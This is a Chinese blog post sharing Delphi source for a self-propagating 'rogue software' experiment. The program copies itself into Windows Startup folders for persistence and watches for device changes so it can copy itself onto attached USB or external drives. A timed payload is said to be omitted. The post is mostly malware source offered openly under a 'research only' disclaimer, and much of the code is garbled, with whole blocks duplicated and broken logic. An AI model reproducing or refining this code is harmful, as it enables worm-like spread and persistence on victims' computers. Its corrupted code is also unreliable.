前不久在学习delphi,因为在做系统维护时经常接触到流氓软件,所以对流氓软件的功能实现有了兴趣,决定通过实践,看看流氓软件的部分功能都是如何实现的。经过一段时间的测试,做了一个极其简单的小软件,软件运行后除了会将自己复制到某些特定的文件夹中,还会自动在后台监视盘符变化,一旦有u盘或者移动硬盘接到计算机上,软件会自动将自身复制到u盘或者移动硬盘的第一个分区上,还可以在制定时间进行一些操作,由于危害比较大,就不贴出来了。因为学delphi时间不长,也就一个月左右,可能有些地方的代码处理的不够简洁,也希望得到高手的指点。本代码只作为研究学习之用,请不要用于非法用途,否则本人概不负责。代码如下:
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Controls, Forms,
Dialogs,ShellApi,StdCtrls, ExtCtrls;
Windows, Messages, SysUtils, Variants, Classes, Controls, Forms,
Dialogs,ShellApi,StdCtrls, ExtCtrls;
type
TForm1 = class(TForm)
Timer1: TTimer;
procedure FormCreate(Sender: TObject);
procedure Timer1Timer(Sender: TObject);
private
{ Private declarations }
procedure WMDeviceChange(var Msg: TMessage); message WM_DEVICECHANGE;
public
{ Public declarations }
end;
TForm1 = class(TForm)
Timer1: TTimer;
procedure FormCreate(Sender: TObject);
procedure Timer1Timer(Sender: TObject);
private
{ Private declarations }
procedure WMDeviceChange(var Msg: TMessage); message WM_DEVICECHANGE;
public
{ Public declarations }
end;
var
Form1: TForm1;
Form1: TForm1;
implementation
{$R *.dfm}
procedure TForm1.WMDeviceChange (var Msg: TMessage);
var
m_Result,i:Integer;
str_temp:string;
buf:array [0..MAX_PATH-1] of char;
begin
Case Msg.WParam of
32768:
begin
m_Result:=GetLogicalDriveStrings(MAX_PATH,buf);
for i:=0 to (m_Result div 4) do
begin
str_temp:=string(buf[i*4]+buf[i*4+1]+buf[i*4+2]);
if getdrivetype(pchar(str_temp)) = DRIVE_CDROM then
begin
if str_temp ='E:\' then
CopyFile(Pchar(Application.ExeName),Pchar('F:\test.exe'),False);
if str_temp ='F:\' then
CopyFile(Pchar(Application.ExeName),Pchar('G:\test.exe'),False);
if str_temp ='G:\' then
CopyFile(Pchar(Application.ExeName),Pchar('H:\test.exe'),False);
if str_temp ='H:\' then
CopyFile(Pchar(Application.ExeName),Pchar('I:\test.exe'),False);
end;
end;
end;
32772:
begin
end;
end;
end;
var
m_Result,i:Integer;
str_temp:string;
buf:array [0..MAX_PATH-1] of char;
begin
Case Msg.WParam of
32768:
begin
m_Result:=GetLogicalDriveStrings(MAX_PATH,buf);
for i:=0 to (m_Result div 4) do
begin
str_temp:=string(buf[i*4]+buf[i*4+1]+buf[i*4+2]);
if getdrivetype(pchar(str_temp)) = DRIVE_CDROM then
begin
if str_temp ='E:\' then
CopyFile(Pchar(Application.ExeName),Pchar('F:\test.exe'),False);
if str_temp ='F:\' then
CopyFile(Pchar(Application.ExeName),Pchar('G:\test.exe'),False);
if str_temp ='G:\' then
CopyFile(Pchar(Application.ExeName),Pchar('H:\test.exe'),False);
if str_temp ='H:\' then
CopyFile(Pchar(Application.ExeName),Pchar('I:\test.exe'),False);
end;
end;
end;
32772:
begin
end;
end;
end;
procedure TForm1.FormCreate(Sender: TObject);
begin
if fileexists('C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\test.exe') and fileexists('C:\Documents and Settings\new\「开始」菜单\程序\启动\test.exe')then
else
CopyFile(Pchar(Application.ExeName),Pchar('C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\test.exe'),False);
CopyFile(Pchar(Application.ExeName),Pchar('C:\Documents and Settings\new\「开始」菜单\程序\启动\test.exe'),False);
end;
begin
if fileexists('C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\test.exe') and fileexists('C:\Documents and Settings\new\「开始」菜单\程序\启动\test.exe')then
else
CopyFile(Pchar(Application.ExeName),Pchar('C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\test.exe'),False);
CopyFile(Pchar(Application.ExeName),Pchar('C:\Documents and Settings\new\「开始」菜单\程序\启动\test.exe'),False);
end;
procedure TForm1.Timer1Timer(Sender: TObject);
var
i,j:integer;
strurl:string;
begin
//可在制定的实践进行一些操作,此处代码危害较大,省略。
end;
var
i,j:integer;
strurl:string;
begin
//可在制定的实践进行一些操作,此处代码危害较大,省略。
end;
end.
转载于:https://blog.51cto.com/sally/116369